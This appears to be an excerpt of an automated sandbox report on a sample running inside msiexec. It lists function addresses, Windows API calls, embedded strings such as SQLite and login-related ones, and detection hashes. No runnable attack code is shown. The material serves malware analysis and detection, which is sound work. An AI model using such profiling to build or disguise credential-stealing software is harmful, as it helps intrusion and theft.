                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 59245283-0
                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                    • API String ID: 3510742995-3273207271
                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                    • memset.MSVCRT ref: 00413ADC
                                                                    • memset.MSVCRT ref: 00413AEC
                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                    • memset.MSVCRT ref: 00413BD7
                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                    • String ID: 3A
                                                                    • API String ID: 3300951397-293699754
                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                    • String ID: strings
                                                                    • API String ID: 3166385802-3030018805
                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041249C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                    • String ID: r!A
                                                                    • API String ID: 2791114272-628097481
                                                                    • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                    • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                    Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                    • String ID: BIN
                                                                    • API String ID: 1668488027-1015027815
                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00411AF6
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                    • String ID: AE$.cfg$General$EA
                                                                    • API String ID: 776488737-1622828088
                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                    • memset.MSVCRT ref: 0040D906
                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 1028950076-4169760276
                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: -journal$-wal
                                                                    • API String ID: 438689982-2894717839
                                                                    • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                    • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Dialog$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3975816621-0
                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                    • API String ID: 1214746602-2708368587
                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                    • memset.MSVCRT ref: 00405E33
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                    • String ID:
                                                                    • API String ID: 2313361498-0
                                                                    • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                    • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                    • String ID:
                                                                    • API String ID: 2047574939-0
                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                    • String ID:
                                                                    • API String ID: 4218492932-0
                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: gj
                                                                    • API String ID: 438689982-4203073231
                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                    • API String ID: 3510742995-2446657581
                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                    • memset.MSVCRT ref: 00405ABB
                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$FocusItemmemset
                                                                    • String ID:
                                                                    • API String ID: 4281309102-0
                                                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscat
                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                    • API String ID: 384018552-4153097237
                                                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 2029023288-3849865405
                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
